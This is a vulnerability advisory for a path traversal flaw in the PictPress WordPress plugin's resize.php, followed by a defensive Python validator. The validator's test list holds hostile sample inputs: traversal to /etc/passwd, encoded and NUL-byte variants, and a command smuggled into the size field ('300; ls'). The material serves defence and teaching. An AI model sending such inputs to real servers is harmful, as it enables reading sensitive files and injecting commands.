Vendor: PictPress
By: Anonymous
CVSS: 7.5 (HIGH)
Vulnerability Class: Remote File Disclosure
CWE: 22
Product Name: PictPress
Affected Version From: Unspecified
Affected Version To: release0.91
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Year: 2007
WordPress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
The vulnerability allows an attacker to disclose arbitrary files on the server by exploiting a file path traversal issue in the 'resize.php' script of the PictPress WordPress plugin. By manipulating the 'size' and 'path' parameters in the URL, an attacker can traverse directories and read sensitive files, such as the '/etc/passwd' file.
Mitigation:
To mitigate this vulnerability, it is recommended to update the PictPress plugin to a version that includes a fix for the file path traversal issue. Alternatively, the plugin can be deactivated or removed if it is not essential for the website's functionality.
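The description above says the flaw is a path traversal through the 'size' and 'path' query parameters of resize.php, and the mitigation section recommends updating or disabling the plugin. As an added example, written for this page and not taken from the PictPress plugin or any patch of it, the following Python shows the input validation a resize-style script needs so that a user-supplied path can never leave the image directory: decode the parameter exactly once (as PHP does when it populates $_GET), refuse NUL bytes, restrict to image extensions, resolve symlinks and '..' segments with realpath, and then check containment with commonpath rather than a string prefix. The image root, the extension allowlist, the size bounds and all sample inputs are constructed assumptions.

```python
import os
from urllib.parse import unquote

# Constructed assumption: the directory the resize script is allowed to read from.
IMAGE_ROOT = "/var/www/html/wp-content/uploads/pictpress"
# Constructed assumption: a resize script only ever needs to open images.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def resolve_image_path(root, requested, allowed_ext=ALLOWED_EXTENSIONS):
    """Return the absolute path for `requested` if it lies inside `root`, else None.

    `requested` is the raw value of a query parameter such as `path`. PHP
    percent-decodes a query value once before the script sees it, so this
    decodes once too; a double-encoded "%252e%252e" therefore becomes the
    literal directory name "%2e%2e", which the filesystem treats as plain text.
    """
    decoded = unquote(requested)

    # A NUL byte can truncate the name inside a C-level open(); reject outright.
    if "\x00" in decoded:
        return None

    # Extension allowlist: '/etc/passwd' or 'wp-config.php' never qualify.
    if os.path.splitext(decoded)[1].lower() not in allowed_ext:
        return None

    # Resolve symlinks and '..' on both sides before comparing. An absolute
    # `requested` makes os.path.join discard `root`, which the containment
    # check below then catches.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))

    # commonpath, not startswith: "/uploads/pictpress-evil" starts with
    # "/uploads/pictpress" as a string but is a different directory.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def validate_size(raw, max_px=2048):
    """Accept only a plain positive integer within bounds for the `size` parameter."""
    if not raw.isdigit():
        return None
    value = int(raw)
    return value if 1 <= value <= max_px else None


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the rest traversal attempts.
    samples = [
        ("300", "gallery/cat.jpg"),
        ("300", "../../../../etc/passwd"),
        ("300", "..%2F..%2Fsecret%2Fphoto.jpg"),
        ("300", "../pictpress-evil/a.jpg"),
        ("300", "cat.jpg%00.txt"),
        ("300; ls", "gallery/cat.jpg"),
    ]
    for size, path in samples:
        px = validate_size(size)
        resolved = resolve_image_path(IMAGE_ROOT, path)
        verdict = "serve" if px and resolved else "reject"
        print(f"size={size!r:10} path={path!r:32} -> {verdict}")
```

The same containment check belongs in the PHP script itself (realpath() plus a directory comparison) before any file is opened; the Python here is only to make the logic testable outside WordPress.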